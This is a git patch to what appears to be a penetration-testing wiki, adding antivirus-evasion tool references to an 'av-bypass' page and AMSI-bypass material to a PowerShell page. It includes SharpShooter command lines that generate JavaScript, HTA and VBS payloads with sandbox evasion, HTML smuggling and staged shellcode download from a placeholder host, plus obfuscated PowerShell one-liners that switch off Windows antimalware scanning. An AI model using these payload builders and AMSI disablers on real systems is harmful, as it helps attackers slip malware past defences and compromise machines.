From b4cf1b25d8855429a848d792162b9eed0261f232 Mon Sep 17 00:00:00 2001
From: CPol
Date: Tue, 10 Nov 2020 09:43:37 +0000
Subject: [PATCH] GitBook: [master] 2 pages modified

---
 windows/av-bypass.md | 27 +++++++++++++++++++
 .../basic-powershell-for-pentesters/README.md | 14 +++++++++-
 2 files changed, 40 insertions(+), 1 deletion(-)

diff --git a/windows/av-bypass.md b/windows/av-bypass.md
index 38dc0147..8beaa773 100644
--- a/windows/av-bypass.md
+++ b/windows/av-bypass.md
@@ -204,6 +204,33 @@ https://github.com/l0ss/Grouper2
 
 {% embed url="http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/" %}
 
+## Other tools
+
+```bash
+# Veil Framework:
+https://github.com/Veil-Framework/Veil
+
+# Shellter
+https://www.shellterproject.com/download/
+
+# Sharpshooter
+# https://github.com/mdsecactivebreach/SharpShooter
+# Javascript Payload Stageless:
+SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+# Stageless HTA Payload:
+SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+# Staged VBS:
+SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+# Donut:
+https://github.com/TheWover/donut
+
+# Vulcan
+https://github.com/praetorian-code/vulcan
+```
+
 ## More
 
 {% embed url="https://github.com/EgeBalci/sgn" %}
diff --git a/windows/basic-powershell-for-pentesters/README.md b/windows/basic-powershell-for-pentesters/README.md
index 38b11285..f87972fc 100644
--- a/windows/basic-powershell-for-pentesters/README.md
+++ b/windows/basic-powershell-for-pentesters/README.md
@@ -329,7 +329,7 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 
 ## AMSI bypass
 
-```text
+```bash
 (old)
 [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
 
@@ -338,5 +338,17 @@ $a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
 $assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
 $field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
 $field.SetValue($null,$true)
+
+
+# Testing for Amsi Bypass:
+https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+# Amsi-Bypass-Powershell
+https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+https://blog.f-secure.com/hunting-for-amsi-bypasses/
+https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+https://slaeryan.github.io/posts/falcon-zero-alpha.html
 ```
 